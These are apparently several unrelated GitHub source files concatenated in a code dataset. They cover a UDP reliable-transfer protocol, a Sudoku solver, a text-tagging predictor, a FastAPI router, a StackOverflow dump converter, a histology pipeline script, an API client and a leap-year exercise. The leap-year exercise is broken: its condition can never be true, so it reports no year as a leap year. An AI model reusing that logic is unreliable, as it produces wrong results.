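sock.settimeout(0.2)
for attempt in range(3):
    try:
        data, sender = sock.recvfrom(1024)
        break
    except socket.timeout:
        print("timeout on attempt", attempt + 1, "- would resend SYN")
sock.close()
```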
MyPacket.from_bytes(data)\n\n # received SYN, send SYN_ACK back\n if p.packet_type == PacketType.SYN:\n server_isn = 999\n\n ack_id = p.seq_num + 1\n self.recv_base = ack_id\n self.send_base = server_isn + 1\n\n addr = (p.peer_ip_addr, p.peer_port)\n self.peer_addr_of_sender = addr\n\n syn_ack_packet = MyPacket(packet_type=PacketType.SYN_ACK,\n seq_num=server_isn,\n peer_ip_addr=addr[0],\n peer_port=addr[1],\n ack_num=ack_id,\n payload=\"\".encode('utf-8'))\n\n while True:\n try:\n self.conn.sendto(syn_ack_packet.to_bytes(), self.router_addr)\n\n self.conn.settimeout(self.timeout)\n\n # after sending SYN_ACK, waiting for ACK response\n print(\"In accept(), waiting for ACK response from sender\")\n response, sender = self.conn.recvfrom(1024)\n response_packet = MyPacket.from_bytes(response)\n if response_packet.packet_type != PacketType.ACK:\n continue\n if response_packet.ack_num != server_isn + 1:\n continue\n print(\"Server state -> ESTABLISHED\")\n\n # allocate resources for receiver\n self.allocate_receiver_resources(response_packet)\n return self\n\n except socket.timeout:\n continue\n\n\n def sendall(self, data:bytes):\n # split data into chunks\n data_len, chunk_size = len(data), self.max_chunk_len\n chunks = [data[i:i+chunk_size] for i in range(0, data_len, chunk_size)]\n print(chunks)\n\n self.is_sending = True\n\n self.send_buffer = [None] * self.wsz\n self.timers = [None] * self.wsz\n self.acks = [False] * self.wsz\n\n initial_seq_num = self.send_base\n print(\"send_base is : \" + str(self.send_base))\n end_seq_num = self.send_base + len(chunks)\n print(\"end of send base is : \" + str(end_seq_num))\n\n # create a thread to monitor timers\n threading.Thread(target=self.timer_monitor, args=(end_seq_num, )).start()\n\n # create a thread to monitor received acks\n threading.Thread(target=self.ack_monitor_sender, args=(end_seq_num, )).start()\n\n # send each chunk\n for i, chunk in enumerate(chunks):\n while self.is_full(self.send_buffer):\n pass\n\n seq_num = initial_seq_num + i\n packet = MyPacket(packet_type=PacketType.ACK,\n seq_num=seq_num,\n peer_ip_addr=self.peer_addr_of_sender[0],\n peer_port=self.peer_addr_of_sender[1],\n ack_num=self.recv_base,\n payload=chunk)\n\n buffer_index = seq_num - self.send_base\n self.send_buffer[buffer_index] = packet\n self.timers[buffer_index] = datetime.now()\n self.conn.sendto(packet.to_bytes(), self.router_addr)\n print(packet)\n\n\n\n # return all data\n def recvall(self):\n while self.is_sending:\n pass\n\n # if timeout_count > 5, meaning that sender finished sending\n max_timeout_count = 3\n timeout_count = 0\n while True:\n data, sender = None, None\n try:\n data, sender = self.conn.recvfrom(1024)\n except socket.timeout:\n timeout_count += 1\n if data is None or sender is None:\n if not self.recv_resources_allocated:\n print(self.recv_resources_allocated)\n continue\n elif timeout_count < max_timeout_count:\n print(timeout_count)\n continue\n else:\n break\n\n timeout_count = 0\n packet = MyPacket.from_bytes(data)\n\n # if allocate_receiver_resources not have been called\n if not self.recv_resources_allocated:\n self.allocate_receiver_resources(packet)\n\n print(packet.payload)\n self.receiver_actions(packet)\n print(self.bytearray_to_be_delivered)\n # if len(packet.payload) < self.max_chunk_len:\n # break\n\n print(\"recvall done\")\n data = bytes(self.bytearray_to_be_delivered)\n self.bytearray_to_be_delivered = None\n self.recv_resources_allocated = False\n return data\n\n\n def allocate_receiver_resources(self, first_packet):\n 
print(\"recv base is: \" + str(self.recv_base))\n\n self.peer_addr_of_receiver = (first_packet.peer_ip_addr, first_packet.peer_port)\n self.recv_buffer = [None] * self.wsz\n self.bytearray_to_be_delivered = bytearray()\n self.recv_resources_allocated = True\n\n # if first_packet contains payload, must response to sender\n if first_packet.payload:\n print(\"First packet contains payload is: \")\n print(first_packet.payload)\n self.receiver_actions(first_packet)\n return\n\n\n def receiver_actions(self, packet_recved:MyPacket):\n seq_num = packet_recved.seq_num\n if self.recv_base <= seq_num <= self.recv_base + self.wsz - 1:\n # return a selective ACK packet\n ack_packet = MyPacket(packet_type=PacketType.ACK,\n seq_num=seq_num,\n peer_ip_addr=self.peer_addr_of_receiver[0],\n peer_port=self.peer_addr_of_receiver[1],\n ack_num=seq_num,\n payload=\"\".encode('utf-8'))\n self.conn.sendto(ack_packet.to_bytes(), self.router_addr)\n\n # if not previously received, buffer it\n buffer_index = seq_num - self.recv_base\n if self.recv_buffer[buffer_index] is None:\n self.recv_buffer[buffer_index] = packet_recved.payload\n\n # slide window, and delivered buffered consecutive blocks\n if seq_num == self.recv_base:\n num_slide = self.num_consecutive_buffers(self.recv_buffer)\n print(\"Slide recv buffer window by \" + str(num_slide))\n\n # deliver to upper layer\n for i in range(num_slide):\n self.bytearray_to_be_delivered.extend(bytearray(self.recv_buffer[i]))\n\n # slide window\n for j in range(num_slide):\n self.recv_buffer.pop(0)\n self.recv_buffer.append(None)\n self.recv_base += 1\n\n elif self.recv_base-self.wsz <= seq_num <= self.recv_base-1:\n # return a selective ACK packet\n ack_packet = MyPacket(packet_type=PacketType.ACK,\n seq_num=seq_num,\n peer_ip_addr=self.peer_addr_of_receiver[0],\n peer_port=self.peer_addr_of_receiver[1],\n ack_num=seq_num,\n payload=\"\".encode('utf-8'))\n self.conn.sendto(ack_packet.to_bytes(), self.router_addr)\n\n\n def timer_monitor(self, end_seq_num):\n while self.send_base < end_seq_num:\n for i in range(self.wsz):\n timer = self.timers[i]\n if timer and (datetime.now() - timer).total_seconds() > self.timeout:\n # trigger timeout event\n seq_num = i + self.send_base\n packet = self.send_buffer[i]\n if packet and seq_num != packet.seq_num:\n print(\"Error, seq_num != packet.seq_num when timeout occurs\")\n else:\n print(\"Resend packet # \" + str(seq_num))\n try:\n self.conn.sendto(packet.to_bytes(), self.router_addr) # resend packet\n except Exception:\n pass\n self.timers[i] = datetime.now() # reset timer\n\n\n def ack_monitor_sender(self, end_seq_num):\n data, sender = None, None\n while self.send_base < end_seq_num:\n try:\n data, sender = self.conn.recvfrom(1024)\n except socket.timeout:\n pass\n if data is None or sender is None:\n continue\n\n # received ack, trigger ack_received event\n packet = MyPacket.from_bytes(data)\n ack_num = packet.ack_num\n\n if self.send_base <= ack_num < self.send_base + self.wsz:\n acks_index = ack_num - self.send_base\n self.acks[acks_index] = True\n self.timers[acks_index] = None\n\n # slide window to the unacknowledged packet with smallest seq num\n if ack_num == self.send_base:\n num_slided = self.num_consecutive_acks(self.acks)\n print(\"Slide send buffer window by \" + str(num_slided))\n\n # slide window\n for k in range(num_slided):\n self.send_buffer.pop(0)\n self.timers.pop(0)\n self.acks.pop(0)\n self.send_buffer.append(None)\n self.timers.append(None)\n self.acks.append(False)\n self.send_base += 1\n print(\"After 
sliding window, sendbase = \" + str(self.send_base))\n time.sleep(self.timeout)\n self.is_sending = False\n print(\"finish sending\")\n\n\n def is_full(self, array):\n return array.count(None) == 0\n\n\n def num_consecutive_buffers(self, array):\n n = self.wsz\n for i in range(self.wsz):\n if array[i] is None:\n n = i\n break\n return n\n\n def num_consecutive_acks(self, array):\n n = self.wsz\n for i in range(self.wsz):\n if array[i] is False:\n n = i\n break\n return n\n\n\n\n\n","repo_name":"fanzou2020/NetworkLabs","sub_path":"P3/rdt/rdt.py","file_name":"rdt.py","file_ext":"py","file_size_in_byte":16961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6366989219","text":"import numpy as np\r\nimport pandas as pd\r\n\r\nd = 9\r\nsd = int(d ** (1 / 2))\r\n\r\nall_possible_choices = [i + 1 for i in range(d)]\r\nrc = {}\r\nraw_sudoku_df = pd.read_excel(io='sudoku.xlsx',\r\n sheet_name=str(d) + \"x\" + str(d)\r\n )\r\n\r\n\r\nclass Soduko:\r\n def __init__(self):\r\n self.s = np.array([0 for i in range(d ** 2)]).reshape(d, sd, sd)\r\n self.x = []\r\n self.y = []\r\n self.z = []\r\n\r\n def imprt(self, rsd):\r\n for br in range(sd):\r\n for bc in range(sd):\r\n self.s[br * sd + bc] = np.array(rsd.iloc[br * sd: br * sd + sd,\r\n bc * sd: bc * sd + sd]\r\n )\r\n for i in range(0, d):\r\n self.x.append(list(np.array(rsd.iloc[i, :])))\r\n self.y.append(list(np.array(rsd.iloc[:, i])))\r\n self.z.append(list(np.hstack(self.s[i])))\r\n\r\n def copy(self, s):\r\n self.s = s.s[:]\r\n self.x = s.x[:]\r\n self.y = s.y[:]\r\n self.z = s.z[:]\r\n\r\nsudoku = Soduko()\r\nsudoku.imprt(raw_sudoku_df)\r\n\r\n\r\ndef disp_sudoku(s):\r\n ###Used to display \"sudoku\" in the process if anywhere needed\r\n for br in range(sd):\r\n for r in range(sd):\r\n for bc in range(sd):\r\n for c in range(sd):\r\n if (bc + 1) % sd == 0 and c + 1 == sd :\r\n print(s.s[(br * sd) + bc][r][c])\r\n elif c + 1 == sd:\r\n print(s.s[(br * sd) + bc][r][c], end=\"\\t|\\t\")\r\n else:\r\n print(s.s[(br * sd) + bc][r][c], end=\"\\t\\t\")\r\n if (bc + 1) % sd == 0 and c + 1 == sd and r + 1 == sd:\r\n print('')\r\n print('-------------------------------------------------------------------------')\r\n\r\ndef qrc(s):\r\n ###Creating a dictionary for each unsolved cell and then filling them with respective available choices and taking care of the unneccessary ones\r\n for i in range(d):\r\n for j in range(d):\r\n if s.x[i][j] == 0:\r\n if (i, j) not in rc.keys():\r\n rc[(i, j)] = all_possible_choices[:]\r\n\r\n for k in all_possible_choices:\r\n if k in rc[(i, j)]:\r\n if k in s.x[i] or k in s.y[j] or k in s.z[(i // sd) * sd + (j // sd)]:\r\n rc[(i, j)].remove(k)\r\n\r\n ###Remaining choices cleanup\r\n _tmp_rc = rc.copy()\r\n for k, v in _tmp_rc.items():\r\n if v == []:\r\n del rc[k]\r\n\r\n\r\ndef solve(s):\r\n ###Checks what cells requires \"handl\"ing and sends the corresponding command\r\n for br in range(sd):\r\n for bc in range(sd):\r\n for r in range(sd):\r\n for c in range(sd):\r\n if s.s[br * sd + bc][r][c] == 0:\r\n handle(s, br, bc, r, c)\r\n\r\ndef assignValue(s, br, bc, r, c, v):\r\n ###Assigns the proposed value in sudoku and all of its derivitives and takes care of the remaining_choices variable\r\n s.s[br * sd + bc][r][c] = v\r\n s.x[br * sd + r][bc * sd + c] = v\r\n s.y[bc * sd + c][br * sd + r] = v\r\n s.z[br * sd + bc][r * sd + c] = v\r\n del rc[(br * sd + r, bc * sd + c)]\r\n\r\ndef singleCandidate(s, br, bc, r, c):\r\n qrc(s)\r\n if (br * sd + r, bc * sd + c) 
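qrc() above prunes each unsolved cell's candidates against its row, column, and block. The same pruning expressed as set difference for one toy cell:

```python
# Digits already used in the cell's row, column and block drop out of
# the candidate set (sample values).
digits = set(range(1, 10))
row, col, box = {5, 3, 7}, {6, 1}, {3, 9, 8}
candidates = digits - row - col - box
print(sorted(candidates))   # [2, 4]
```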
in rc.keys():\r\n if len(rc[(br * sd + r, bc * sd + c)]) == 1:\r\n assignValue(s, br, bc, r, c, rc[(br * sd + r, bc * sd + c)][0])\r\n # else:\r\n # rc[(br * sub_dim + r, bc * sub_dim + c)] = possible_choices_for_the_current_cell\r\n\r\ndef onlyPossibleCell(s, br, bc, r, c):\r\n # print(list(rc.keys()).count((br * sub_dim + r, bc * sub_dim + c)))\r\n qrc(s)\r\n if list(rc.keys()).count((br * sd + r, bc * sd + c)) != 0:\r\n if len(rc[(br * sd + r, bc * sd + c)]) != 0:\r\n while True:\r\n a = set(rc[(br * sd + r, bc * sd + c)])\r\n ## Only Possible Cell in the block\r\n for i in range(sd):\r\n for j in range(sd):\r\n if (i, j) != (r, c):\r\n if list(rc.keys()).count((br * sd + i, bc * sd + j)) != 0:\r\n if len(rc[(br * sd + i, bc * sd + j)]) != 0:\r\n b = set(rc[(br * sd + i, bc * sd + j)])\r\n a = set(a).difference(b)\r\n if len(a) == 1:\r\n break\r\n\r\n # Only Possible Cell in the row\r\n for j in range(d):\r\n if j != bc * sd + c:\r\n if list(rc.keys()).count((br * sd + r, j)) != 0:\r\n if len(rc[(br * sd + r, j)]) != 0:\r\n b = set(rc[(br * sd + r, j)])\r\n a = set(a).difference(b)\r\n if len(a) == 1:\r\n break\r\n\r\n # Only Possible Cell in the col\r\n for i in range(d):\r\n if i != br * sd + r:\r\n if list(rc.keys()).count((i, bc * sd + c)) != 0:\r\n if len(rc[(i, bc * sd + c)]) != 0:\r\n b = set(rc[(i, bc * sd + c)])\r\n a = set(a).difference(b)\r\n if len(a) == 1:\r\n break\r\n\r\n break\r\n\r\n if len(a) == 1:\r\n assignValue(s, br, bc, r, c, list(a)[0])\r\n\r\n\r\ndef handle(s, br, bc, r, c):\r\n ###\"Handle\"s the given cell\r\n singleCandidate(s, br, bc, r, c)\r\n onlyPossibleCell(s, br, bc, r, c)\r\n\r\n\r\nfor i in range(1, d * 2):\r\n flat_sudoku = np.hstack(np.hstack(sudoku.s))\r\n if 0 in flat_sudoku:\r\n solve(sudoku)\r\n else:\r\n break\r\n\r\ndisp_sudoku(sudoku)\r\n","repo_name":"Pejhan/Sudoku","sub_path":"Sudoku1.0.py","file_name":"Sudoku1.0.py","file_ext":"py","file_size_in_byte":5853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74019826407","text":"# tagifai/predict.py\n# Prediction operations.\n\nfrom distutils.util import strtobool\nfrom typing import Dict, List\n\nimport numpy as np\nimport torch\n\nfrom tagifai import data, train\n\n\ndef predict(texts: List, artifacts: Dict, device: torch.device = torch.device(\"cpu\")) -> Dict:\n \"\"\"Predict tags for an input text using the\n best model from the `best` experiment.\n\n Usage:\n\n ```python\n texts = [\"Transfer learning with BERT.\"]\n artifacts = load_artifacts(run_id=\"264ac530b78c42608e5dea1086bc2c73\")\n predict(texts=texts, artifacts=artifacts)\n ```\n
\n    [\n      {\n          \"input_text\": \"Transfer learning with BERT.\",\n          \"preprocessed_text\": \"transfer learning bert\",\n          \"predicted_tags\": [\n            \"attention\",\n            \"language-modeling\",\n            \"natural-language-processing\",\n            \"transfer-learning\",\n            \"transformers\"\n          ]\n      }\n    ]\n
        \n\n Note:\n The input parameter `texts` can hold multiple input texts and so the resulting prediction dictionary will have `len(texts)` items.\n\n Args:\n texts (List): List of input texts to predict tags for.\n artifacts (Dict): Artifacts needed for inference.\n device (torch.device): Device to run model on. Defaults to CPU.\n\n Returns:\n Predicted tags for each of the input texts.\n\n \"\"\"\n # Retrieve artifacts\n params = artifacts[\"params\"]\n label_encoder = artifacts[\"label_encoder\"]\n tokenizer = artifacts[\"tokenizer\"]\n model = artifacts[\"model\"]\n\n # Prepare data\n preprocessed_texts = [\n data.preprocess(\n text,\n lower=bool(strtobool(str(params.lower))), # params.lower could be str/bool\n stem=bool(strtobool(str(params.stem))),\n )\n for text in texts\n ]\n X = np.array(tokenizer.texts_to_sequences(preprocessed_texts), dtype=\"object\")\n y_filler = np.zeros((len(X), len(label_encoder)))\n dataset = data.CNNTextDataset(X=X, y=y_filler, max_filter_size=int(params.max_filter_size))\n dataloader = dataset.create_dataloader(batch_size=int(params.batch_size))\n\n # Get predictions\n trainer = train.Trainer(model=model, device=device)\n _, y_prob = trainer.predict_step(dataloader)\n y_pred = [np.where(prob >= float(params.threshold), 1, 0) for prob in y_prob]\n tags = label_encoder.decode(y_pred)\n predictions = [\n {\n \"input_text\": texts[i],\n \"preprocessed_text\": preprocessed_texts[i],\n \"predicted_tags\": tags[i],\n }\n for i in range(len(tags))\n ]\n\n return predictions\n","repo_name":"GokuMohandas/follow","sub_path":"tagifai/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"25529333345","text":"from fastapi import APIRouter, HTTPException\nfrom fastapi.responses import JSONResponse\nfrom app.models.recipients_list import RecipientsListModel as RecipientsList\nfrom app.models.newsletter_topics import NewsletterTopicsModel as Newsletter\nfrom app.services.recipients_list_service import RecipientsListService\n\nrecipients_router = APIRouter()\nrecipients_list_service = RecipientsListService()\n\n@recipients_router.get(\n \"/{admin_email}/recipients/\", \n response_model=RecipientsList, \n status_code=200, \n tags=[\"recipients_list\"])\ndef get_recipients_list(admin_email: str):\n service_response = recipients_list_service.get_recipients(admin_email)\n\n if service_response.get(\"error\", None):\n raise HTTPException(status_code=404, detail=service_response[\"error\"])\n \n return JSONResponse(status_code=200, content=service_response)\n\n@recipients_router.post(\n \"/{admin_email}/recipients/create-list/\", \n response_model=dict, \n status_code=200, \n tags=[\"recipients_list\"])\ndef create_recipients_list(admin_email: str, recipients_list: RecipientsList):\n service_response = recipients_list_service.create_new_recipients_list(admin_email, recipients_list)\n\n if service_response.get(\"error\", None):\n raise HTTPException(status_code=404, detail=service_response[\"error\"])\n \n return JSONResponse(status_code=201, content=service_response)\n\n@recipients_router.put(\n \"/{admin_email}/recipients/add-recipient/{new_recipient}\", \n response_model=dict, \n status_code=200, \n tags=[\"recipients_list\"])\ndef add_recipients(admin_email: str, new_recipient: str):\n service_response = recipients_list_service.add_new_recipient(admin_email, new_recipient)\n\n if service_response.get(\"error\", None):\n raise 
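predict() above turns per-tag probabilities into a multi-label prediction with np.where. The cutoff in isolation, on toy probabilities:

```python
# Probabilities at or above the threshold become 1, the rest 0.
import numpy as np

y_prob = np.array([[0.91, 0.12, 0.55], [0.30, 0.80, 0.49]])
threshold = 0.5
y_pred = [np.where(prob >= threshold, 1, 0) for prob in y_prob]
print(y_pred)   # [array([1, 0, 1]), array([0, 1, 0])]
```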
HTTPException(status_code=404, detail=service_response[\"error\"])\n \n return JSONResponse(status_code=201, content=service_response)\n\n@recipients_router.put(\n \"/{admin_email}/recipients/{recipient}/unsub/\", \n response_model=dict, \n status_code=200, \n tags=[\"recipients_list\"])\ndef add_recipient_unsub(admin_email: str, recipient: str, unsub_topics: Newsletter):\n topics_list = dict(unsub_topics)\n \n service_response = recipients_list_service.update_recipient_unsubs(\n admin_email, \n recipient, \n topics_list[\"topics\"].split(\",\")\n )\n\n if service_response.get(\"error\", None):\n raise HTTPException(status_code=404, detail=service_response[\"error\"])\n \n return JSONResponse(status_code=201, content=service_response)\n","repo_name":"david-oaxaca/newsletter-mvp","sub_path":"newsletter-api/app/routers/recipients_list_router.py","file_name":"recipients_list_router.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70972074407","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis script processes stackoverflow dump obtained from stackexchange dump\nand produces a set of CSV files suitable for use with mysqlimport\n\nThe StackExchange data dump can be downloaded here:\n https://archive.org/details/stackexchange\n\n\n\"\"\"\n\nimport sys\nimport argparse\nimport csv\nimport xml.sax\nimport re\n\nPY3 = sys.version_info > (3,)\n\n\ndef iNone(attr):\n try:\n return int(attr)\n except (ValueError, TypeError) as e:\n return None\n\n\nclass DictWriter(object):\n # custom writer with utf8 conversion for Python 2\n init = False\n\n def _escape(self, value):\n return re.sub('([\\\\\\\\\"])', \"\\\\\\\\\\\\1\", value)\n\n def _convert(self, value):\n if isinstance(value, basestring):\n return '\"{}\"'.format(self._escape(value.encode('utf8')))\n elif value is None:\n return ''\n return str(value)\n\n def _convert3(self, value):\n if isinstance(value, bytes):\n return '\"{}\"'.format(self._escape(value.decode('utf8')))\n if isinstance(value, str):\n return '\"{}\"'.format(self._escape(value))\n elif value is None:\n return ''\n return str(value)\n\n def __init__(self, fh, fields):\n self.stream = fh\n self.fields = fields\n if PY3:\n self._convert = self._convert3\n\n def writerow(self, row):\n pass\n if not self.init:\n self.init = True\n else:\n self.stream.write(\"\\r\\n\")\n\n for i, field in enumerate(self.fields):\n self.stream.write(self._convert(row[field]))\n self.stream.write(\",\")\n\n\nclass SOHandler(xml.sax.ContentHandler):\n\n writer = None\n tags_fname = None\n tagwriter_fname = None\n tagwriter = None\n tags = None\n\n def row_handler(self): pass\n\n def __init__(self, tags_fname=None, tagwriter_fname=None):\n self.writer = csv.writer(sys.stdout)\n self.tags_fname = tags_fname or \"so_tag_names.csv\"\n self.tagwriter_fname = tagwriter_fname or \"tags.csv\"\n # this is an old-style class, so explicit __init__ instead of super()\n xml.sax.ContentHandler.__init__(self)\n\n def _post_tags(self, tagline):\n \"\"\" example of a tag line:\n \n \"\"\"\n return set([tag.lstrip(\"<\") for tag in tagline.split(\">\") if tag])\n\n def _parse_post(self, attrs):\n post_id = int(attrs['Id'])\n is_question = int(attrs.get('PostTypeId') == \"1\")\n if is_question:\n for tag in self._post_tags(attrs.get('Tags')):\n tag_id = self.tags[tag]\n self.tagwriter.writerow({\n 'post_id': post_id,\n 'tag_id': tag_id\n })\n return {\n 'id': post_id,\n 'question': is_question,\n 
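The router above follows one convention throughout: the service returns a dict, and an "error" key is surfaced as an HTTPException. A minimal sketch of that convention; the route and service here are hypothetical stand-ins, runnable under uvicorn with fastapi installed:

```python
# Hypothetical route demonstrating the dict-with-"error" convention.
from fastapi import FastAPI, HTTPException
from fastapi.responses import JSONResponse

app = FastAPI()

def fake_service(email: str) -> dict:
    return {"recipients": []} if email == "a@b.c" else {"error": "not found"}

@app.get("/{admin_email}/recipients/")
def get_recipients(admin_email: str):
    service_response = fake_service(admin_email)
    if service_response.get("error", None):
        raise HTTPException(status_code=404, detail=service_response["error"])
    return JSONResponse(status_code=200, content=service_response)
```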
'title': attrs.get('Title'), # no title for answers\n 'body': attrs['Body'],\n 'owner_id': iNone(attrs.get('OwnerUserId')),\n 'accepted_answer': attrs.get('accepted_answer'),\n 'created_at': attrs['CreationDate'],\n 'score': int(attrs.get('Score', 0)),\n 'parent_id': iNone(attrs.get('ParentId')),\n 'views': int(attrs.get('ViewCount', 0)),\n 'last_editor_id': iNone(attrs.get('OwnerUserId')),\n 'last_edited_at': attrs.get('LastEditDate'),\n 'last_activity_at': attrs.get('LastEditDate'),\n 'community_owned_at': attrs.get('CommunityOwnedDate'),\n 'answers_count': int(attrs.get('AnswerCount', 0)),\n 'comments_count': int(attrs.get('CommentCount', 0)),\n 'favorites_count': int(attrs.get('FavoriteCount', 0)),\n }\n\n def _parse_user(self, attrs):\n return {\n 'id': int(attrs['Id']),\n 'name': attrs['DisplayName'],\n 'email_hash': None,\n 'reputation': int(attrs.get('Reputation'), 0),\n 'created_at': attrs['CreationDate'],\n 'website_url': attrs.get('WebsiteUrl'),\n 'location': attrs.get('Location'),\n 'age': iNone(attrs.get('Age')),\n 'views': int(attrs.get('Views', 0)),\n 'upvotes': int(attrs.get('UpVotes', 0)),\n 'downvotes': int(attrs.get('DownVotes', 0)),\n 'about_me': attrs.get('AboutMe')\n }\n\n def _parse_tag(self, attrs):\n return {\n 'id': int(attrs['Id']),\n 'name': attrs['TagName'],\n 'count': int(attrs.get('Count'), 0),\n 'excerpt_post_id': iNone(attrs.get('ExcerptPostId')),\n 'wiki_post_id': iNone(attrs.get('WikiPostId'))\n }\n\n def _parse_vote(self, attrs):\n return {\n 'id': int(attrs['Id']),\n 'post_id': attrs['PostId'],\n 'vote_type': int(attrs.get('VoteTypeId')),\n 'created_at': attrs['CreationDate']\n }\n\n def deferred_init(self, name):\n if name == 'posts':\n self.tags = {\n row[1]: int(row[0]) for row in csv.reader(\n open(self.tags_fname, 'r'))}\n columns = ['id', 'question', 'title', 'body', 'owner_id',\n 'accepted_answer', 'created_at', 'score', 'parent_id',\n 'views', 'last_editor_id', 'last_edited_at',\n 'last_activity_at', 'community_owned_at',\n 'answers_count', 'comments_count', 'favorites_count']\n self.row_handler = self._parse_post\n self.tagwriter = DictWriter(\n open(self.tagwriter_fname, 'w'), ['post_id', 'tag_id'])\n elif name == 'users':\n columns = ['id', 'name', 'email_hash', 'reputation', 'created_at',\n 'website_url', 'location', 'age', 'views', 'upvotes',\n 'downvotes', 'about_me']\n self.row_handler = self._parse_user\n elif name == 'tags':\n columns = ['id', 'name', 'count', 'excerpt_post_id', 'wiki_post_id']\n self.row_handler = self._parse_tag\n elif name == 'votes':\n columns = ['id', 'post_id', 'vote_type', 'created_at']\n self.row_handler = self._parse_vote\n else:\n raise ValueError('posts, users, tags or votes tag expected')\n\n self.writer = DictWriter(sys.stdout, columns)\n\n def startElement(self, name, attrs):\n if name in ('posts', 'tags', 'users', 'votes'):\n self.deferred_init(name)\n elif name == 'row': # ignore all other tags\n # if any(attrs.get(k) != v for k, v in self.filters.items()):\n # return\n self.writer.writerow(self.row_handler(attrs))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=\"Transform stackexchange dump to csv format. 
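Note the misplaced default in the _parse_user and _parse_tag helpers above: int(attrs.get('Reputation'), 0) passes 0 as int()'s base argument and raises TypeError when the attribute is missing; the default belongs inside get(), as the record's own iNone helper does correctly. Demonstrated on an empty attribute dict:

```python
# int(x, 0) treats 0 as the numeric *base*, not a fallback value.
attrs = {}  # simulating a row with no Reputation attribute

try:
    int(attrs.get("Reputation"), 0)
except TypeError as e:
    print("base-0 form fails:", e)

print(int(attrs.get("Reputation", 0)))   # 0 -- the intended default
```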
The script \"\n \"accept XML file on standard input and prints CSV to \"\n \"the standard output\")\n args = parser.parse_args()\n\n parser = xml.sax.make_parser()\n parser.setContentHandler(SOHandler())\n parser.parse(sys.stdin)\n # parser.parse(open('Posts2200.xml', 'r')) # sys.stdin)\n","repo_name":"arunk054/ghd","sub_path":"so/so_import.py","file_name":"so_import.py","file_ext":"py","file_size_in_byte":7173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5238730596","text":"\"\"\"\nEXERCÍCIO 032: Ano Bissexto\n\nFaça um programa que leia um ano qualquer e mostre se ele é BISSEXTO.\n\"\"\"\nfrom datetime import date\nano = int(input('Digite um ano para conferir (Coloque 0 para analisar o ano atual): '))\n\nif ano == 0:\n ano = date.today().year\n\nbissexto = ano % 4 == 0 and ano % 100 != 0 and ano % 400 == 0\nif bissexto:\n print(f'O ano {ano} é BISSEXTO.')\nelse:\n print(f'O ano {ano} não é bissexto')\n","repo_name":"bruno-gs/Python","sub_path":"Curso em video/Fundamentos - M1/IF/IF... ELSE/ex032.py","file_name":"ex032.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3324956946","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 1 08:20:34 2017\n\n@author: jungbt\n\"\"\"\nimport os\nimport sys\nimport hist_pipeline_gray as pip\nsys.path.append(os.getcwd()) \npipe = pip.Pipeline()\n#pipe.run()\npipe.input.histology.dir = '/data/NIMH_LBC_49ers/NIMH_macaque_brain/Subjects/gb8A/GB8A_Thionin/'\npipe.input.bf.dir = '/data/NIMH_LBC_49ers/NIMH_macaque_brain/Subjects/gb8A/GB8A_Blockface/blockface_volume/alignment_2/manual_tracing_output'\npipe.input.MRI.name = '/data/NIMH_LBC_49ers/NMT_D99_test/GB8A_to_NMT/GB8A_SS/GB8A_T1_SS_re.nii.gz'\npipe.input.root_dir = '/data/NIMH_LBC_49ers/NIMH_macaque_brain/Subjects/gb8A/pipeline_test_final_high3'\npipe.input.histology.pattern = 'GB8A_**.jpg'\npipe.input.bf.pattern = 'GB8A_**.jpg'\npipe.input.histology.orientation = 'SRP'\npipe.input.bf.orientation = 'SRP'\npipe.input.histology.pix_dim = [0.025,0.025,0.250]\npipe.input.bf.pix_dim = [0.03,0.03,0.250]\npipe.input.overwrite = False\npipe.input.threads = 181\npipe.input.reg_method = 'nonlinear'\npipe.input.resolution_level = 'MRI'\npipe.input.color = False\npipe.input.print_inputs()\npipe.run()","repo_name":"Bencephalon/NMB","sub_path":"nonlinear_bf_align.py","file_name":"nonlinear_bf_align.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4552683713","text":"# -*- coding: utf-8 -*-\nimport settings\nimport json\nimport httplib2\ntry:\n from conf.default import DEFAULT_BK_API_VER\nexcept:\n DEFAULT_BK_API_VER = 'v2'\n\nclass EsbClient:\n bk_token = ''\n\n def __init__(self, request):\n if request:\n self.bk_token = request.COOKIES.get(settings.BK_COOKIE_NAME, None)\n\n def call(self, module, action, param, version=''):\n if not version:\n version = DEFAULT_BK_API_VER\n http = httplib2.Http()\n if version == '' or version == 'v1':\n param['app_code'] = settings.APP_ID\n param['app_secret'] = settings.APP_TOKEN\n if self.bk_token:\n param['bk_token'] = self.bk_token\n else:\n param['username'] = settings.APP_ID\n elif version == 'v2':\n param['bk_app_code'] = settings.APP_ID\n param['bk_app_secret'] = settings.APP_TOKEN\n if self.bk_token:\n param['bk_token'] = self.bk_token\n else:\n param['bk_username'] = 
settings.APP_ID\n else:\n return {'result': False, 'message': u'API version \"{0}\" does not exist'.format(version), \"data\": None}\n headers = {'Content-type': 'application/json'}\n url = \"{0}/api/c/compapi/{1}/{2}/\".format(settings.BK_PAAS_HOST, module, action)\n response, content = http.request(url, 'POST', headers=headers, body=json.dumps(param))\n if response[\"status\"] == \"200\":\n return json.loads(content)\n else:\n return {\"data\": None, \"message\": u\"The request failed, error status: {0}\".format(response[\"status\"]), \"result\": False}\n\ndef get_esb_client(request=None):\n return EsbClient(request)\n","repo_name":"EthanJii/bk-exam","sub_path":"esb/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71676576169","text":"import numpy as np\nfrom objectClasses import Obstacle\n\ndef 